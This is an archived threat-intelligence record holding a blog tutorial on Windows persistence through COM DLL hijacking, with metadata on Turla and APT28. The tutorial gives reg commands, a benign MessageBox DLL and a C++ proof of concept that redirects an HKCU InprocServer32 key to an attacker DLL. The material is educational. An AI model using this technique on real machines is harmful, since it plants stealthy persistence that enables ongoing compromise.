{ "id": "84ffc25c-472f-4747-8706-e18d5cd27a50", "created_at": "2026-04-06T00:18:40.010439Z", "updated_at": "2026-04-10T13:12:28.311397Z", "deleted_at": null, "sha1_hash": "a4a698e467acc8ef2673767c7ceee66e8dce124b", "title": "Malware development: persistence - part 3. COM DLL hijack. Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2290681, "plain_text": "Malware development: persistence - part 3. COM DLL hijack.\r\nSimple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-05-02 · Archived: 2026-04-05 12:42:23 UTC\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is a next part of a series of articles on windows malware persistence techniques and tricks.\r\nToday I’ll write about the result of own research into another persistence trick: COM hijacking.\r\nComponent Object ModelPermalink\r\nIn Windows 3.11, Microsoft introduced the Component Object Model (COM) is an object-oriented system meant\r\nto create binary software components that can interact with other objects. It’s an interface technology that allows\r\nyou to reuse items without knowing how they were made internally.\r\nI’ll show you how red commands can use COM objects to run arbitrary code on behalf of a trusted process in this\r\npost.\r\nWhen a software needs to load a COM object, it uses the Windows API CoCreateInstance to construct an\r\nuninitialized object instance of a specific class, with the CLSID as one of the needed parameters (class identifier).\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 1 of 12\n\nWhen a program calls CoCreateInstance with a particular CLSID value, the operating system consults the\r\nregistry to discover which binary contains the requested COM code:\r\nThe contents of the InProcServer32 subkey under the CLSID key seen in the previous image are presented in\r\nthe next image:\r\nIn my case, firefox.exe calling CoCreateInstance with CLSID : {A1DB7B5E-D0EA-4FE0-93C4-\r\n314505788272} . The C:\\Windows\\System32\\TaskFlowDataEngine.dll file associated with the registry key\r\nHKCU\\Software\\Classes\\CLSID\\{A1DB7B5E-D0EA-4FE0-93C4-314505788272}\\InprocServer32\r\nThere are a variety of ways to execute code, but COM has been employed in red teaming circumstances for\r\npersistence, lateral movement, and defense evasion in various instances. Various registry sub-keys are used during\r\nCOM Hijacking depending on how the malicious code is run. These are the following:\r\nInprocServer/InprocServer32\r\nLocalServer/LocalServer32\r\nTreatAs\r\nProgID\r\nThe sub-keys listed above are found in the following registry hives:\r\nHKEY_CURRENT_USER\\Software\\Classes\\CLSID\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 2 of 12\n\nHKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\r\nhow to discover COM keys for hijackingPermalink\r\nIdentification of COM keys that could be used to commit COM hijacking is simple and just requires the use of\r\nsysinternals Process Monitor to find COM servers that lack CLSID s. It also does not require elevated privileges\r\n( HKCU ). The following filters can be set up in Process Monitor:\r\nAlso still good to add: Exclude if path starts with HKLM\r\nThe HKEY CURRENT USER ( HKCU ) key is examined first when trying to load COM objects, giving preference to\r\nuser-specified COM objects rather than system-wide COM objects (additional information in HKEY CLASSES ROOT\r\nkey).\r\nIn my case, the firefox.exe process exhibits this behavior in the image below. The process is attempting to\r\naccess CLSID A6FF50C0-56C0-71CA-5732-BED303A59628 at the HKCU registry key. Because the CLSID isn’t\r\nfound in the HKCU registry key, Windows reverts to HCKR ( HKLM beneath the hood) for the identical CLSID ,\r\nwhich worked in the previous attempt. This can be checked with commands:\r\nreg query \"HKCU\\Software\\Classes\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32\" /s\r\nreg query \"HKCR\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32\" /s\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 3 of 12\n\nFollowing the steps outlined above, we now have critical information that we may use to launch a COM Hijacking\r\nattack.\r\nattack processPermalink\r\nFirst off all, export the specified subkeys, entries, and values of the local computer into a file:\r\nreg export \"HKCR\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32\" C:\\Users\\User\\Desktop\\shared\\2022\r\nThe next step is modify this file to set the default value of “HKCU\\Software\\Classes\\CLSID{A6FF50C0-56C0-\r\n71CA-5732-BED303A59628}\\InprocServer32” registry key:\r\nAs you can see, we are placing custom DLL to be executed:\r\nFor simplicity, as always I took all the same file from one of my previous posts.\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 4 of 12\n\nYou can compile it from source code ( evil.cpp ):\r\n/*\r\nevil.cpp\r\nsimple DLL for DLL inject to process\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {\r\n switch (nReason) {\r\n case DLL_PROCESS_ATTACH:\r\n MessageBox(\r\n NULL,\r\n \"Meow from evil.dll!\",\r\n \"=^..^=\",\r\n MB_OK\r\n );\r\n break;\r\n case DLL_PROCESS_DETACH:\r\n break;\r\n case DLL_THREAD_ATTACH:\r\n break;\r\n case DLL_THREAD_DETACH:\r\n break;\r\n }\r\n return TRUE;\r\n}\r\nThen, just run:\r\nx86_64-w64-mingw32-g++ -shared -o evil.dll evil.cpp -fpermissive\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 5 of 12\n\nSave reg file as evil.reg :\r\nAnd import, then check registry again:\r\nreg import C:\\Users\\User\\Desktop\\shared\\2022-05-02-malware-pers-3\\evil.reg /reg:64\r\nreg query \"HKCU\\Software\\Classes\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32\" /s\r\nPerfect!\r\ndemoPermalink\r\nThen restart firefox.exe in my case, wait some time. I’ve be waiting around 7 mins:\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 6 of 12\n\nIf you notice then PID is 9272 . But if you open Process Hacker you can see that it’s not here:\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 7 of 12\n\nFirefox crashed after a some time:\r\nbut it happened the only time.\r\nLater, the “meow-meow” messagebox window popped-up with some frequency:\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 8 of 12\n\nAnd even after closing firefox :\r\nThat’s perfectly! :)\r\nupdate: programmer wayPermalink\r\nI also created pers.cpp dirty PoC script:\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 9 of 12\n\n/*\r\npers.cpp\r\nwindows low level persistence via COM hijacking\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003ccstdio\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // subkey\r\n const char* sk = \"Software\\\\Classes\\\\CLSID\\\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\\\InprocServer32\";\r\n // malicious DLL\r\n const char* dll = \"C:\\\\Users\\\\User\\\\Desktop\\\\shared\\\\2022-05-02-malware-pers-3\\\\evil.dll\";\r\n // startup\r\n LONG res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)sk, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUE\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry keys\r\n RegSetValueEx(hkey, NULL, 0, REG_SZ, (unsigned char*)dll, strlen(dll));\r\n RegCloseKey(hkey);\r\n } else {\r\n printf(\"cannot create subkey for hijacking :(\\n\");\r\n return -1;\r\n }\r\n return 0;\r\n}\r\ncompile it:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nand run:\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 10 of 12\n\nAs you can see, everything is work perfectly :)\r\nCleaning after completion of experiments:\r\nreg delete \"HKCU\\Software\\Classes\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\" /f\r\nconclusionPermalink\r\nAn attacker can employ a not-so-common but widely used technique to ensure silent persistence in a system after\r\nexecuting this actions. In the wild, this trick was often used by groups such as APT 28, Turla, as well as Mosquito\r\nbackdoor.\r\nCOM hijacking MITRE ATT\u0026CK\r\nAPT 28\r\nTurla\r\nRegCreateKeyEx\r\nRegSetValueEx\r\nreg query\r\nreg import\r\nreg export\r\nreg delete\r\nsource code in github\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 11 of 12\n\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html" ], "report_names": [ "malware-pers-3.html" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434720, "ts_updated_at": 1775826748, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a4a698e467acc8ef2673767c7ceee66e8dce124b.pdf", "text": "https://archive.orkl.eu/a4a698e467acc8ef2673767c7ceee66e8dce124b.txt", "img": "https://archive.orkl.eu/a4a698e467acc8ef2673767c7ceee66e8dce124b.jpg" } }